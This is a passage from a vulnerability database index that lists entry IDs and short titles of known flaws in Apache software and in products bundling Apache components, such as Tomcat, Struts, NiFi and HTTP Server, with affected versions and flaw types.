| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
| [119306] Apache MXNet Network Interface privilege escalation
| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
| [118143] Apache NiFi activemq-client Library Deserialization denial of service
| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
| [117115] Apache Tika up to 1.17 tika-server command injection
| [116929] Apache Fineract getReportType Parameter privilege escalation
| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
| [116926] Apache Fineract REST Parameter privilege escalation
| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
| [115883] Apache Hive up to 2.3.2 privilege escalation
| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
| [115518] Apache Ignite 2.3 Deserialization privilege escalation
| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
| [113895] Apache Geode up to 1.3.x Code Execution
| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
| [113747] Apache Tomcat Servlets privilege escalation
| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
| [112885] Apache Allura up to 1.8.0 File information disclosure
| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
| [112625] Apache POI up to 3.16 Loop denial of service
| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
| [112339] Apache NiFi 1.5.0 Header privilege escalation
| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
| [112114] Oracle 9.1 Apache Log4j privilege escalation
| [112113] Oracle 9.1 Apache Log4j privilege escalation
| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
| [110701] Apache Fineract Query Parameter sql injection
| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
| [110106] Apache CXF Fediz Spring cross site request forgery
| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108938] Apple macOS up to 10.13.1 apache denial of service
| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108935] Apple macOS up to 10.13.1 apache denial of service
| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108931] Apple macOS up to 10.13.1 apache denial of service
| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108929] Apple macOS up to 10.13.1 apache denial of service
| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
| [108782] Apache Xerces2 XML Service denial of service
| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
| [108629] Apache OFBiz up to 10.04.01 privilege escalation
| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
| [107639] Apache NiFi 1.4.0 XML External Entity
| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107197] Apache Xerces Jelly Parser XML File XML External Entity
| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
| [107084] Apache Struts up to 2.3.19 cross site scripting
| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
| [105878] Apache Struts up to 2.3.24.0 privilege escalation
| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
| [105643] Apache Pony Mail up to 0.8b weak authentication
| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
| [103690] Apache OpenMeetings 1.0.0 sql injection
| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
| [103688] Apache OpenMeetings 1.0.0 weak encryption
| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
| [103352] Apache Solr Node weak authentication
| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
| [102536] Apache Ranger up to 0.6 Stored cross site scripting
| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
| [99937] Apache Batik up to 1.8 privilege escalation
| [99936] Apache FOP up to 2.1 privilege escalation
| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
| [99930] Apache Traffic Server up to 6.2.0 denial of service
| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
| [117569] Apache Hadoop up to 2.7.3 privilege escalation
| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
13105| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
13106| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
13107| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
13108| [99014] Apache Camel Jackson/JacksonXML privilege escalation
13109| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
13110| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
13111| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
13112| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
13113| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
13114| [98605] Apple macOS up to 10.12.3 Apache denial of service
13115| [98604] Apple macOS up to 10.12.3 Apache denial of service
13116| [98603] Apple macOS up to 10.12.3 Apache denial of service
13117| [98602] Apple macOS up to 10.12.3 Apache denial of service
13118| [98601] Apple macOS up to 10.12.3 Apache denial of service
13119| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
13120| [98405] Apache Hadoop up to 0.23.10 privilege escalation
13121| [98199] Apache Camel Validation XML External Entity
13122| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
13123| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
13124| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
13125| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
13126| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
13127| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
13128| [97081] Apache Tomcat HTTPS Request denial of service
13129| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
13130| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
13131| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
13132| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
13133| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
13134| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
13135| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
13136| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
13137| [95311] Apache Storm UI Daemon privilege escalation
13138| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
13139| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
13140| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
13141| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
